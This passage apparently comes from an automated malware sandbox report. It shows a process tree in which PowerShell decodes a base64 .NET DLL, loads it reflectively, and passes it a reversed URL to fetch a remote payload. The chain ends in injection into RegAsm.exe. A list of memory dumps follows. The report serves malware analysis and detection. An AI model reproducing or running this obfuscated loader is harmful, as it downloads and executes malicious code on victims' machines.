AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');powershell.exe -Command $VXdfe; Remove-Item -Path C:\Users\Admin\AppData\Local\Temp\x.vbs
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2648
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '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c3RhbmNlAGRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2UAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAU2VjdXJpdHlQcm90b2NvbFR5cGUAR2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUATWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAU3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEhlbHBLZXl3b3JkQXR0cmlidXRlAEdlbmVyYXRlZENvZGVBdHRyaWJ1dGUARGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAEVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAU3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGUASGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAERlYnVnZ2VySGlkZGVuQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBzZXRfRW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AcmVzb3VyY2VNYW4AU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBNZXRob2RJbmZvAEN1bHR1cmVJbmZvAG1fQXBwT2JqZWN0UHJvdmlkZXIAbV9Vc2VyT2JqZWN0UHJvdmlkZXIAbV9Db21wdXRlck9iamVjdFByb3ZpZGVyAG1fTXlXZWJTZXJ2aWNlc09iamVjdFByb3ZpZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLk15LlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAUnVudGltZUhlbHBlcnMAQ29uY2F0AE9iamVjdABNeVByb2plY3QAU3lzdGVtLk5ldABnZXRfRGVmYXVsdABXZWJDbGllbnQAQ29udmVydABTeXN0ZW0uVGV4dABtX0NvbnRleHQAQ2xhc3NMaWJyYXJ5My5NeQBnZXRfQXNzZW1ibHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAe3QAeAB0AC4AMwAwAGUAcABtAHUAUgAvADMAMAAtAGUAcABtAHUAcgAvAHMAbQBlAHQAaQAvADIAMQAvAGcAcgBvAC4AZQB2AGkAaABjAHIAYQAuAHMAdQAuADMAMAA0ADEAMAA2AGEAaQAvAC8AOgBzAHAAdAB0AGgAAQUDJgMmAQNBAABFQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawAAF1wAdgA0AC4AMAAuADMAMAAzADEAOQAAKUMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBDAGwAYQBzAHMAMQAAB1IAdQBuAAAXXABSAGUAZwBBAHMAbQAuAGUAeABlAAAAe000wQGMFUmZ7QBV0BJNAQAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFBByAEAQ4ODg4GFRIoARIMBhUSKAESCAYVEigBEmEGFRIoARIkBCAAEwAFAAICHBwHAAESaRGAjQUgABKAkQcgAgEOEoCRCAABEoCVEoCVCAcEDg4OEoCJBgABARGAnQUAABKApQYgAQESgKUEAAEODgQgAQ4OBSACDg4OBQACDg4OBQAAEoCxBQABHQUOByABEoCRHQUFIAESaQ4GIAESgLkOBiACHBwdHAYAAQESgIkDAAABBAABHBwEIAECHAMgAAgDIAAOBAcBHgACHgAFEAEAHgAECgEeAAQHARMABhUSKAETAAcGFRJtARMABhUSbQETAAITAAQKARMABSABARMACLd6XFYZNOCJCLA/X38R1Qo6BwYVEigBEgwHBhUSKAESCAcGFRIoARJhBwYVEigBEiQDBhJ9BAYSgIEDBhIYBAAAEgwEAAASCAQAABJhBAAAEiQEAAASfQUAABKAgQYAAQESgIEEAAASGAQAAQEOBCAAEmkHEAEBHgAeAAcwAQEBEB4ABAgAEgwECAASCAQIABJhBAgAEiQECAASfQUIABKAgQQIABIYBCgAEwAIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAABQEAAAAAKQEAJDc5MTcyQjEzLUVEQkEtNDA5Ni1CNzI1LThFOTJCNzMwQjJCQQAADAEABzEuMC4wLjAAAEkBABouTkVURnJhbWV3b3JrLFZlcnNpb249djQuNQEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUSLk5FVCBGcmFtZXdvcmsgNC41BAEAAAAIAQABAAAAAAAYAQAKTXlUZW1wbGF0ZQgxMS4wLjAuMAAAQQEAM1N5c3RlbS5SZXNvdXJjZXMuVG9vbHMuU3Ryb25nbHlUeXBlZFJlc291cmNlQnVpbGRlcggxNi4wLjAuMAAAWQEAS01pY3Jvc29mdC5WaXN1YWxTdHVkaW8uRWRpdG9ycy5TZXR0aW5nc0Rlc2lnbmVyLlNldHRpbmdzU2luZ2xlRmlsZUdlbmVyYXRvcggxNi4yLjAuMAAAYQEANFN5c3RlbS5XZWIuU2VydmljZXMuUHJvdG9jb2xzLlNvYXBIdHRwQ2xpZW50UHJvdG9jb2wSQ3JlYXRlX19JbnN0YW5jZV9fE0Rpc3Bvc2VfX0luc3RhbmNlX18AAAAQAQALTXkuQ29tcHV0ZXIAABMBAA5NeS5BcHBsaWNhdGlvbgAADAEAB015LlVzZXIAABMBAA5NeS5XZWJTZXJ2aWNlcwAAEAEAC015LlNldHRpbmdzAAAAAAC0AAAAzsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAAAAAAAAAAAAFBBRFBBRFC0AAAAAAAAAEjHs6YAAAAAAgAAAHkAAAA0OgAANBwAAAAAAAAAAAAA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';[Byte[]] $HWqMQ = [System.Convert]::FromBase64String( $pICwv );[System.AppDomain]::CurrentDomain.Load($HWqMQ).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('WG8b/war/edoc/oi.slootw//:sptth'))"
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1048
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:720

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/720-348-0x0000000000400000-0x000000000040C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/720-350-0x00000000053B0000-0x000000000544C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/720-360-0x0000000005560000-0x000000000556A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/720-358-0x00000000055F0000-0x0000000005682000-memory.dmp

    Filesize

    584KB

    Download

  • memory/720-359-0x0000000005310000-0x00000000053AC000-memory.dmp

    Filesize

    624KB

    Download

  • memory/720-351-0x0000000005950000-0x0000000005E4E000-memory.dmp

    Filesize

    5.0MB

    Download

  • memory/720-349-0x0000000000400000-0x000000000040C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1048-332-0x000002BFF40E0000-0x000002BFF40E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1048-333-0x000002BFF4290000-0x000002BFF4292000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1048-326-0x000002BFF40A0000-0x000002BFF40C2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1048-336-0x000002BFF4250000-0x000002BFF425C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1048-329-0x000002BFF4720000-0x000002BFF4796000-memory.dmp

    Filesize

    472KB

    Download

  • memory/1048-335-0x000002BFF4296000-0x000002BFF4298000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1048-334-0x000002BFF4293000-0x000002BFF4295000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2648-352-0x0000026B997E6000-0x0000026B997E8000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2648-311-0x0000026BB19E0000-0x0000026BB1A02000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2648-317-0x0000026BB1D90000-0x0000026BB1E06000-memory.dmp

    Filesize

    472KB

    Download

  • memory/2648-318-0x0000026B997E3000-0x0000026B997E5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2648-316-0x0000026B997E0000-0x0000026B997E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3432-128-0x00007FF9863F0000-0x00007FF986400000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3432-116-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3432-121-0x0000019202360000-0x0000019202362000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3432-122-0x0000019202360000-0x0000019202362000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3432-118-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3432-119-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3432-120-0x0000019202360000-0x0000019202362000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3432-117-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3432-129-0x00007FF9863F0000-0x00007FF986400000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3432-256-0x000001920E8B0000-0x000001920E8B4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/3432-115-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3872-315-0x00000209DC016000-0x00000209DC018000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3872-297-0x00000209DC010000-0x00000209DC012000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3872-294-0x00000209DBF90000-0x00000209DBFB2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3872-298-0x00000209DC013000-0x00000209DC015000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3872-299-0x00000209F42E0000-0x00000209F4356000-memory.dmp

    Filesize

    472KB

    Download